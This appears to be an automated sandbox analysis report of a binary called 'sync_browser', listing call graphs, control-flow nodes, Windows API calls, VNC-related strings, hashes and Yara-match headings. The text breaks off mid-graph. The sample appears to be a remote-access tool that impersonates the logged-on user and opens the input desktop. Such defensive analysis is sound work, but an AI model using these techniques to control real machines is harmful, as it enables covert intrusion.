7ff7d5954003 227 API calls 2 library calls 23222 7ff7d5963523 92 API calls 2 library calls 23228 7ff7d593ff30 11 API calls _getdrive 23230 7ff7d5953530 120 API calls 2 library calls 23232 7ff7d594a130 173 API calls 4 library calls 23234 7ff7d5954003 210 API calls 2 library calls 23235 7ff7d593cf80 120 API calls 4 library calls 23236 7ff7d593f780 71 API calls __wtomb_environ 23237 7ff7d595e780 97 API calls __wtomb_environ 23238 7ff7d594dd80 121 API calls 23239 7ff7d594bb80 122 API calls 2 library calls 23240 7ff7d593d790 11 API calls _getdrive 23242 7ff7d5934790 DeleteCriticalSection 23243 7ff7d595f790 96 API calls 2 library calls 23244 7ff7d5959390 121 API calls _RunAllParam 23246 7ff7d5948190 125 API calls _RunAllParam 23247 7ff7d5942b5e 87 API calls 22318 7ff7d5955958 22319 7ff7d595596d 22318->22319 22320 7ff7d5955981 22319->22320 22389 7ff7d595c2c0 22319->22389 22322 7ff7d595597e 22320->22322 22322->22320 22323 7ff7d595599d EnterCriticalSection 22322->22323 22430 7ff7d599d890 97 API calls _RunAllParam 22323->22430 22325 7ff7d59559e2 22326 7ff7d5957b7e LeaveCriticalSection 22325->22326 22327 7ff7d5957b2e 22325->22327 22328 7ff7d5957afe FlushFileBuffers 22325->22328 22370 7ff7d5954003 22326->22370 22327->22326 22331 7ff7d5957b4e FlushFileBuffers 22327->22331 22431 7ff7d599dfc0 CloseHandle 22328->22431 22432 7ff7d599dfc0 CloseHandle 22331->22432 22334 7ff7d5957c72 22335 7ff7d5957c95 22334->22335 22336 7ff7d5957c81 Sleep 22334->22336 22337 7ff7d5957cf7 22335->22337 22338 7ff7d5957ca6 FlushFileBuffers 22335->22338 22336->22335 22339 7ff7d5957d08 FlushFileBuffers 22337->22339 22340 7ff7d5957d59 22337->22340 22338->22337 22341 7ff7d5957ce6 CloseHandle 22338->22341 22339->22340 22342 7ff7d5957d48 CloseHandle 22339->22342 22434 7ff7d599a3b0 93 API calls 2 library calls 22340->22434 22341->22337 22342->22340 22345 7ff7d5957d62 22346 7ff7d5957d85 22345->22346 22435 7ff7d5962170 16 API calls 22345->22435 22349 7ff7d5957dbc 22346->22349 22350 7ff7d5957d9d CloseDesktop 22346->22350 22347 7ff7d5962220 GetLastError PostMessageA EnterCriticalSection LeaveCriticalSection 22347->22370 22356 7ff7d5933730 _RunAllParam 89 API calls 22349->22356 22350->22349 22352 7ff7d5957da7 22350->22352 22351 7ff7d5933730 89 API calls _RunAllParam 22351->22370 22354 7ff7d5933730 _RunAllParam 89 API calls 22352->22354 22353 7ff7d59531b0 27 API calls 22353->22370 22354->22349 22358 7ff7d5957dfc GetModuleFileNameA 22356->22358 22357 7ff7d595c590 16 API calls 22357->22370 22363 7ff7d5957e15 22358->22363 22364 7ff7d5957e56 LoadLibraryA 22358->22364 22359 7ff7d599d440 16 API calls 22359->22370 22361 7ff7d595419d GetTickCount 22361->22370 22362 7ff7d5933730 _RunAllParam 89 API calls 22365 7ff7d5954075 OpenInputDesktop 22362->22365 22436 7ff7d59ea140 70 API calls 3 library calls 22363->22436 22367 7ff7d5957e6b GetProcAddress 22364->22367 22368 7ff7d5957e9d 22364->22368 22365->22370 22371 7ff7d5957c54 22365->22371 22374 7ff7d5957e8f FreeLibrary 22367->22374 22382 7ff7d5957edd 22368->22382 22437 7ff7d594e580 97 API calls _RunAllParam 22368->22437 22369 7ff7d599d890 97 API calls 22369->22370 22370->22334 22370->22347 22370->22351 22370->22353 22370->22357 22370->22359 22370->22361 22370->22362 22370->22369 22378 7ff7d5957c47 CloseDesktop 22370->22378 22380 7ff7d59540bf CloseDesktop 22370->22380 22426 7ff7d599a5b0 98 API calls 2 library calls 22370->22426 22427 7ff7d599a3b0 93 API calls 2 library calls 22370->22427 22428 7ff7d59995d0 EnterCriticalSection LeaveCriticalSection 22370->22428 22429 7ff7d595c6f0 18 API calls _RunAllParam 22370->22429 22433 7ff7d595c4e0 93 API calls _RunAllParam 22370->22433 22373 7ff7d5933730 _RunAllParam 89 API calls 22371->22373 22372 7ff7d5957e26 22372->22364 22373->22334 22374->22368 22378->22334 22378->22371 22380->22370 22383 7ff7d5957fb2 22382->22383 22385 7ff7d5933730 _RunAllParam 89 API calls 22382->22385 22384 7ff7d59e7220 _getdrive 8 API calls 22383->22384 22386 7ff7d5957ff0 22384->22386 22387 7ff7d5957f3e 22385->22387 22438 7ff7d599ab00 95 API calls _RunAllParam 22387->22438 22390 7ff7d5933730 _RunAllParam 89 API calls 22389->22390 22391 7ff7d595c309 EnterCriticalSection 22390->22391 22393 7ff7d595c348 22391->22393 22394 7ff7d595c338 LeaveCriticalSection 22391->22394 22396 7ff7d595c363 22393->22396 22397 7ff7d595c353 LeaveCriticalSection 22393->22397 22395 7ff7d595c4b7 22394->22395 22398 7ff7d59e7220 _getdrive 8 API calls 22395->22398 22399 7ff7d595c37e 22396->22399 22400 7ff7d595c36e LeaveCriticalSection 22396->22400 22397->22395 22401 7ff7d595c4c7 22398->22401 22402 7ff7d5933730 _RunAllParam 89 API calls 22399->22402 22400->22395 22401->22322 22403 7ff7d595c393 22402->22403 22439 7ff7d599a130 73 API calls _getdrive 22403->22439 22405 7ff7d595c39a 22406 7ff7d595c39e 22405->22406 22407 7ff7d595c3cd 22405->22407 22408 7ff7d5933730 _RunAllParam 89 API calls 22406->22408 22440 7ff7d599a0c0 22407->22440 22411 7ff7d595c3bc LeaveCriticalSection 22408->22411 22410 7ff7d595c3d7 22412 7ff7d5933730 _RunAllParam 89 API calls 22410->22412 22411->22395 22413 7ff7d595c3f1 22412->22413 22414 7ff7d595c4a1 22413->22414 22443 7ff7d5999bc0 LoadLibraryA 22413->22443 22415 7ff7d595c4a3 LeaveCriticalSection 22414->22415 22415->22395 22418 7ff7d595c413 OpenProcess OpenProcessToken 22420 7ff7d595c43d 22418->22420 22421 7ff7d595c446 ImpersonateLoggedOnUser 22418->22421 22419 7ff7d595c480 22419->22415 22422 7ff7d595c491 timeGetTime 22419->22422 22424 7ff7d5933730 _RunAllParam 89 API calls 22420->22424 22421->22420 22423 7ff7d595c46c CloseHandle CloseHandle 22421->22423 22422->22415 22423->22419 22425 7ff7d595c46a 22424->22425 22425->22423 22426->22370 22427->22370 22429->22370 22430->22325 22431->22327 22432->22326 22433->22370 22434->22345 22436->22372 22438->22383 22439->22405 22466 7ff7d5999ef0 22440->22466 22442 7ff7d599a0d2 22442->22410 22444 7ff7d5999c11 GetProcAddress GetProcAddress 22443->22444 22445 7ff7d5999c46 22443->22445 22444->22445 22451 7ff7d5999c40 22444->22451 22446 7ff7d5999c49 GetSystemMetrics 22445->22446 22447 7ff7d5999c80 CreateToolhelp32Snapshot 22446->22447 22448 7ff7d5999c58 22446->22448 22449 7ff7d5999c94 Process32First 22447->22449 22450 7ff7d5999cb7 22447->22450 22448->22447 22452 7ff7d5999c61 GetCurrentProcessId ProcessIdToSessionId 22448->22452 22453 7ff7d5999cae CloseHandle 22449->22453 22459 7ff7d5999cd0 22449->22459 22454 7ff7d5999cc5 22450->22454 22455 7ff7d5999cbc FreeLibrary 22450->22455 22451->22446 22452->22447 22453->22450 22457 7ff7d59e7220 _getdrive 8 API calls 22454->22457 22455->22454 22458 7ff7d595c40f 22457->22458 22458->22418 22458->22419 22460 7ff7d5999d5a Process32Next 22459->22460 22461 7ff7d5999d0b CloseHandle 22459->22461 22462 7ff7d5999cf6 ProcessIdToSessionId 22459->22462 22507 7ff7d59e9700 22459->22507 22460->22459 22460->22461 22464 7ff7d5999d26 22461->22464 22465 7ff7d5999d1d FreeLibrary 22461->22465 22462->22459 22462->22460 22464->22454 22465->22464 22467 7ff7d5999f28 22466->22467 22482 7ff7d5999fdc 22466->22482 22470 7ff7d5999f30 GetProcessWindowStation 22467->22470 22467->22482 22468 7ff7d5999f3b 22473 7ff7d5933730 _RunAllParam 89 API calls 22468->22473 22469 7ff7d5999fec 22495 7ff7d5999d80 22469->22495 22470->22468 22472 7ff7d5999f47 GetUserObjectInformationA GetLastError SetLastError 22470->22472 22475 7ff7d5999f79 RevertToSelf 22472->22475 22476 7ff7d5999fae 22472->22476 22477 7ff7d599a0a9 22473->22477 22480 7ff7d5933730 _RunAllParam 89 API calls 22475->22480 22481 7ff7d5999fb7 22476->22481 22476->22482 22477->22442 22478 7ff7d599a000 GetUserNameA 22479 7ff7d599a06f 22478->22479 22483 7ff7d599a012 GetLastError 22478->22483 22485 7ff7d5933730 _RunAllParam 89 API calls 22479->22485 22484 7ff7d5999fa1 22480->22484 22486 7ff7d5933730 _RunAllParam 89 API calls 22481->22486 22482->22468 22482->22469 22487 7ff7d599a01f 22483->22487 22488 7ff7d599a044 GetLastError 22483->22488 22484->22442 22489 7ff7d599a087 22485->22489 22490 7ff7d5999fcc 22486->22490 22491 7ff7d5933730 _RunAllParam 89 API calls 22487->22491 22492 7ff7d5933730 _RunAllParam 89 API calls 22488->22492 22489->22442 22490->22442 22493 7ff7d599a034 22491->22493 22494 7ff7d599a062 22492->22494 22493->22442 22494->22442 22496 7ff7d5999bc0 84 API calls 22495->22496 22497 7ff7d5999da3 22496->22497 22498 7ff7d5999da7 22497->22498 22499 7ff7d5999dae OpenProcess OpenProcessToken 22497->22499 22505 7ff7d59e7220 _getdrive 8 API calls 22498->22505 22500 7ff7d5999de0 22499->22500 22501 7ff7d5999de7 GetTokenInformation 22499->22501 22502 7ff7d5999eb7 CloseHandle 22500->22502 22503 7ff7d5999e16 LookupAccountSidA CloseHandle CloseHandle 22501->22503 22504 7ff7d5999ea9 CloseHandle 22501->22504 22502->22498 22503->22498 22504->22502 22506 7ff7d5999eda 22505->22506 22506->22478 22506->22479 22508 7ff7d59e970d 22507->22508 22509 7ff7d59e9731 22507->22509 22508->22509 22510 7ff7d59effc8 _errno 70 API calls 22508->22510 22511 7ff7d59e9717 22510->22511 22514 7ff7d59f49d4 22511->22514 22517 7ff7d59f4964 DecodePointer 22514->22517 22518 7ff7d59f49c3 22517->22518 22519 7ff7d59e9722 22517->22519 22524 7ff7d59f4930 16 API calls _invalid_parameter_noinfo 22518->22524 22519->22459 23248 7ff7d593d560 19 API calls 2 library calls 23249 7ff7d5940760 95 API calls free 23253 7ff7d5944970 97 API calls 2 library calls 23254 7ff7d5940b70 89 API calls 23255 7ff7d593ab70 95 API calls _RunAllParam 23256 7ff7d5933770 111 API calls 2 library calls

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 7ff7d59536d0-7ff7d59537b6 SetErrorMode call 7ff7d5933730 GetCurrentThreadId GetThreadDesktop call 7ff7d59533a0 8 7ff7d59537bc-7ff7d59537c8 call 7ff7d594f940 0->8 9 7ff7d5957fb4-7ff7d5957fd3 0->9 12 7ff7d59537ce-7ff7d59537e0 8->12 13 7ff7d59539ea-7ff7d5953a33 call 7ff7d5933730 8->13 14 7ff7d5957fe1-7ff7d5958010 call 7ff7d59e7220 9->14 15 7ff7d59537fe-7ff7d595380d 12->15 16 7ff7d59537e2-7ff7d59537f3 12->16 26 7ff7d5953a39-7ff7d5953abe call 7ff7d599d170 call 7ff7d5933730 timeGetTime call 7ff7d5995f30 13->26 27 7ff7d5957ef3-7ff7d5957f11 13->27 23 7ff7d5953814-7ff7d5953858 call 7ff7d59e851c call 7ff7d59e92a4 * 2 call 7ff7d599a320 15->23 16->15 19 7ff7d59537f5-7ff7d59537fc 16->19 19->23 43 7ff7d595385a-7ff7d595385d 23->43 44 7ff7d5953874-7ff7d59538ad 23->44 69 7ff7d5953b17-7ff7d5953bea call 7ff7d5964bc0 call 7ff7d59f4a10 GetComputerNameA 26->69 70 7ff7d5953ac0-7ff7d5953b11 EnterCriticalSection call 7ff7d594aed0 LeaveCriticalSection 26->70 27->14 38 7ff7d5957f17-7ff7d5957f23 27->38 38->14 41 7ff7d5957f29-7ff7d5957fb2 call 7ff7d5933730 call 7ff7d599ab00 38->41 41->14 47 7ff7d5953867-7ff7d595386a 43->47 48 7ff7d595385f-7ff7d5953862 call 7ff7d59e8bf4 43->48 44->14 59 7ff7d59538b3-7ff7d59538c8 44->59 47->44 53 7ff7d595386c-7ff7d595386f call 7ff7d59e8bf4 47->53 48->47 53->44 61 7ff7d59538ca 59->61 62 7ff7d5953905-7ff7d5953926 59->62 65 7ff7d59538d0-7ff7d59538e4 SleepEx 61->65 66 7ff7d5953928 62->66 67 7ff7d5953932-7ff7d59539bd call 7ff7d5933730 call 7ff7d599a290 62->67 65->14 71 7ff7d59538ea-7ff7d5953903 65->71 66->67 111 7ff7d59539c2-7ff7d59539c4 67->111 86 7ff7d5953c5c-7ff7d5953c7d 69->86 87 7ff7d5953bec-7ff7d5953c04 69->87 70->69 71->62 71->65 89 7ff7d5953c83-7ff7d5953c9c gethostname 86->89 90 7ff7d5953c06 87->90 91 7ff7d5953c41-7ff7d5953c55 call 7ff7d59e8f48 87->91 94 7ff7d5953c9e-7ff7d5953cad call 7ff7d59e85e0 89->94 95 7ff7d5953caf-7ff7d5953cb6 call 7ff7d5953220 89->95 96 7ff7d5953c10-7ff7d5953c3f call 7ff7d59ea120 90->96 91->89 102 7ff7d5953c57 91->102 105 7ff7d5953cbb-7ff7d5953cd4 94->105 95->105 96->91 106 7ff7d5953d53-7ff7d5953d80 102->106 105->106 108 7ff7d5953cd6-7ff7d5953cdf 105->108 109 7ff7d5953da2-7ff7d5953dbf 106->109 110 7ff7d5953d82-7ff7d5953da0 106->110 108->106 112 7ff7d5953ce1-7ff7d5953ce3 108->112 113 7ff7d5953dc2-7ff7d5953ec6 call 7ff7d599d710 109->113 110->113 111->14 114 7ff7d59539ca-7ff7d59539e5 call 7ff7d5933730 111->114 112->106 115 7ff7d5953ce5-7ff7d5953d15 112->115 113->9 122 7ff7d5953ecc-7ff7d5953ed8 113->122 114->14 116 7ff7d5953d20-7ff7d5953d2d 115->116 116->116 119 7ff7d5953d2f-7ff7d5953d50 116->119 119->106 122->9 123 7ff7d5953ede-7ff7d5953eef call 7ff7d599d600 122->123 123->9 126 7ff7d5953ef5-7ff7d5953fff call 7ff7d5933730 EnterCriticalSection call 7ff7d59e92a4 CreateRectRgn DeleteObject call 7ff7d59e8bf4 LeaveCriticalSection call 7ff7d59c7d90 123->126 139 7ff7d5954003-7ff7d5954016 126->139 141 7ff7d595401c-7ff7d5954023 call 7ff7d599a5b0 139->141 142 7ff7d59540d1-7ff7d59540dd 139->142 141->142 151 7ff7d5954029-7ff7d5954045 call 7ff7d5933730 141->151 144 7ff7d59540f7-7ff7d59540fc 142->144 145 7ff7d59540df-7ff7d59540e2 142->145 148 7ff7d59540fe-7ff7d595412f call 7ff7d5962220 call 7ff7d59995d0 144->148 149 7ff7d5954134-7ff7d5954159 call 7ff7d5962220 144->149 145->144 147 7ff7d59540e4-7ff7d59540f2 call 7ff7d59531b0 * 2 145->147 147->144 148->149 158 7ff7d59541ee-7ff7d59541fa 149->158 159 7ff7d595415f-7ff7d595418f call 7ff7d595c590 149->159 151->142 164 7ff7d595404b-7ff7d5954094 call 7ff7d5933730 * 2 OpenInputDesktop 151->164 166 7ff7d59541fc-7ff7d5954203 158->166 167 7ff7d595421d-7ff7d5954225 158->167 178 7ff7d59541e4-7ff7d59541e9 159->178 179 7ff7d5954191-7ff7d595419b 159->179 198 7ff7d595409a-7ff7d59540b0 call 7ff7d5933730 call 7ff7d599a3b0 164->198 199 7ff7d5957c66 164->199 166->167 173 7ff7d5954205-7ff7d5954218 call 7ff7d595c590 166->173 169 7ff7d595426d-7ff7d5954270 167->169 170 7ff7d5954227-7ff7d5954253 167->170 176 7ff7d5954284-7ff7d5954286 169->176 177 7ff7d5954272-7ff7d595427f call 7ff7d595c6f0 169->177 174 7ff7d5954268 170->174 175 7ff7d5954255-7ff7d5954263 call 7ff7d599d440 170->175 173->167 174->169 175->174 186 7ff7d5954288-7ff7d59542a4 176->186 187 7ff7d59542c6-7ff7d59542db 176->187 177->176 178->158 179->178 184 7ff7d595419d-7ff7d59541bd GetTickCount 179->184 184->178 189 7ff7d59541bf-7ff7d59541cf 184->189 191 7ff7d59542b6-7ff7d59542c1 186->191 192 7ff7d59542a6-7ff7d59542b1 call 7ff7d599d440 186->192 193 7ff7d59542dd-7ff7d59542e1 187->193 194 7ff7d595431e-7ff7d5954337 call 7ff7d599d890 187->194 189->178 197 7ff7d59541d1-7ff7d59541df call 7ff7d599d440 189->197 191->187 192->191 193->194 195 7ff7d59542e3-7ff7d59542f8 193->195 207 7ff7d595433d-7ff7d5954347 194->207 208 7ff7d5957c78-7ff7d5957c7f 194->208 195->194 210 7ff7d59542fa-7ff7d5954313 call 7ff7d599d890 195->210 197->178 222 7ff7d5957c47-7ff7d5957c52 CloseDesktop 198->222 223 7ff7d59540b6-7ff7d59540bd 198->223 201 7ff7d5957c6d call 7ff7d5933730 199->201 211 7ff7d5957c72 201->211 212 7ff7d595438b-7ff7d5957c14 207->212 213 7ff7d5954349-7ff7d5954361 207->213 214 7ff7d5957c95-7ff7d5957ca4 208->214 215 7ff7d5957c81-7ff7d5957c8f Sleep 208->215 210->208 234 7ff7d5954319-7ff7d595431c 210->234 211->208 235 7ff7d5957c23-7ff7d5957c25 212->235 236 7ff7d5957c16-7ff7d5957c1e call 7ff7d595c4e0 212->236 213->212 219 7ff7d5957cf7-7ff7d5957d06 214->219 220 7ff7d5957ca6-7ff7d5957ce4 FlushFileBuffers 214->220 215->214 224 7ff7d5957d08-7ff7d5957d46 FlushFileBuffers 219->224 225 7ff7d5957d59-7ff7d5957d71 call 7ff7d599a3b0 219->225 220->219 227 7ff7d5957ce6-7ff7d5957cec CloseHandle 220->227 222->211 233 7ff7d5957c54-7ff7d5957c64 222->233 229 7ff7d59540c8-7ff7d59540cc 223->229 230 7ff7d59540bf-7ff7d59540c2 CloseDesktop 223->230 224->225 231 7ff7d5957d48-7ff7d5957d4e CloseHandle 224->231 240 7ff7d5957d73-7ff7d5957d8d call 7ff7d5962170 225->240 241 7ff7d5957d94-7ff7d5957d9b 225->241 227->219 229->142 230->229 231->225 233->201 234->207 235->208 239 7ff7d5957c27-7ff7d5957c42 235->239 236->235 239->139 240->241 243 7ff7d5957dbc-7ff7d5957e13 call 7ff7d5933730 GetModuleFileNameA 241->243 244 7ff7d5957d9d-7ff7d5957da5 CloseDesktop 241->244 252 7ff7d5957e15-7ff7d5957e53 call 7ff7d59ea220 243->252 253 7ff7d5957e56-7ff7d5957e69 LoadLibraryA 243->253 244->243 246 7ff7d5957da7-7ff7d5957db7 call 7ff7d5933730 244->246 246->243 252->253 255 7ff7d5957e6b-7ff7d5957e97 GetProcAddress FreeLibrary 253->255 256 7ff7d5957e9d-7ff7d5957ec0 253->256 255->256 260 7ff7d5957edd-7ff7d5957ef0 256->260 261 7ff7d5957ec2-7ff7d5957ed8 call 7ff7d594e580 call 7ff7d59c7c90 256->261 260->27 261->260
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Desktop$Thread$CloseCriticalSection$CurrentEnterFilefree$BuffersErrorFlushHandleInputLeaveLibraryNameObjectOpenSleep$AddressComputerCountCreateDeleteFreeInformationLastLoadModeModulePriorityProcRectTickTimeUser_snprintfgethostnametime
                                                    • String ID: ( $ - $Could not connect to %s!$Could not connect using %s!$Host name unavailable$LOGEXIT$WinVNC$\logging.dll$application mode$service mode$vncclient.cpp : PostAddNewClient I$vncclient.cpp : PostAddNewClient II$vncclient.cpp : authenticated connection$vncclient.cpp : client connected : %s (%hd)$vncclient.cpp : client disconnected : %s (%hd)$vncclient.cpp : failed to close desktop$vncclient.cpp : negotiated version$vncclient.cpp : sent pixel format to client$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : PostAddNewClient failed$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
                                                    • API String ID: 459429253-3399855497
                                                    • Opcode ID: 8432e4efc740345091377005b2eacb5c278ac1678e2a0acd21ca72edf8fc683e
                                                    • Instruction ID: 7ba62b16500b7bc84e62c6bd115fc8d745b46febf34b995eb903bfbc91847b0d
                                                    • Opcode Fuzzy Hash: 8432e4efc740345091377005b2eacb5c278ac1678e2a0acd21ca72edf8fc683e
                                                    • Instruction Fuzzy Hash: 55A29D22608A9186E754EF25C848BFEABA1FB84F98FC44232DE1D477A5CF38D555C720

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressLibraryProcProcess$CloseCreateCurrentFirstFreeHandleLoadMetricsProcess32SessionSnapshotSystemToolhelp32
                                                    • String ID: ProcessIdToSessionId$WTSGetActiveConsoleSessionId$explorer.exe$kernel32.dll
                                                    • API String ID: 1881659197-3751679782
                                                    • Opcode ID: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
                                                    • Instruction ID: 8193e1a37fd29b82ec6c60b1d60092f998a6bb55c3d4398f5935bd2b67d8e39a
                                                    • Opcode Fuzzy Hash: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
                                                    • Instruction Fuzzy Hash: 8C416E32A187568BEB14AB25A80457DA7A4FF88F94FC41136ED5E17798EF3CE404CB60

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    • vncservice.cpp : getusername error %d, xrefs: 00007FF7D599A04A
                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS , xrefs: 00007FF7D599A094
                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s , xrefs: 00007FF7D599A06F
                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on , xrefs: 00007FF7D599A01F
                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station , xrefs: 00007FF7D5999F3B
                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user , xrefs: 00007FF7D5999FB7
                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0, xrefs: 00007FF7D5999F7F
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$User$InformationNameObjectProcessRevertSelfStationWindow
                                                    • String ID: vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0$vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s $vncservice.cpp : getusername error %d
                                                    • API String ID: 3635673080-2232443292
                                                    • Opcode ID: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                    • Instruction ID: 1728cf2b9f1580ccd783158118235c8f17362c3b95db6e05a80736063fe73014
                                                    • Opcode Fuzzy Hash: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                    • Instruction Fuzzy Hash: 1B414965A0C56287EB04AB29F8406BDEBA1BFC4B48FC45033DE0D86569DF3DE545C760

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 552 7ff7d5939d00-7ff7d5939d9b call 7ff7d59329a0 555 7ff7d5939d9d 552->555 556 7ff7d5939db3-7ff7d5939dc7 OpenSCManagerA 552->556 559 7ff7d5939da0-7ff7d5939db1 call 7ff7d59e8894 555->559 557 7ff7d5939dc9-7ff7d5939dce 556->557 558 7ff7d5939de0-7ff7d5939e25 EnumServicesStatusA 556->558 560 7ff7d5939dd9-7ff7d5939ddb 557->560 561 7ff7d5939dd0-7ff7d5939dd4 call 7ff7d59e7914 557->561 562 7ff7d5939fed-7ff7d5939ffc CloseServiceHandle 558->562 563 7ff7d5939e2b-7ff7d5939e36 GetLastError 558->563 559->556 567 7ff7d593a00b-7ff7d593a031 call 7ff7d59e7220 560->567 561->560 569 7ff7d593a007 562->569 570 7ff7d5939ffe-7ff7d593a002 call 7ff7d59e7914 562->570 563->562 568 7ff7d5939e3c-7ff7d5939e3f call 7ff7d59e71fc 563->568 574 7ff7d5939e44-7ff7d5939e4e 568->574 569->567 570->569 574->562 576 7ff7d5939e54-7ff7d5939e8d EnumServicesStatusA 574->576 577 7ff7d5939fe5-7ff7d5939fe8 call 7ff7d59e78d4 576->577 578 7ff7d5939e93-7ff7d5939e9a 576->578 577->562 578->577 580 7ff7d5939ea0 578->580 581 7ff7d5939ea3-7ff7d5939ea6 580->581 582 7ff7d5939eac-7ff7d5939ec5 OpenServiceA 581->582 583 7ff7d5939fe1 581->583 582->583 584 7ff7d5939ecb-7ff7d5939edf QueryServiceConfigA 582->584 583->577 585 7ff7d5939fc7-7ff7d5939fdb CloseServiceHandle 584->585 586 7ff7d5939ee5-7ff7d5939eee GetLastError 584->586 585->581 585->583 586->585 587 7ff7d5939ef4-7ff7d5939f02 call 7ff7d59e71fc 586->587 587->585 590 7ff7d5939f08-7ff7d5939f1e QueryServiceConfigA 587->590 591 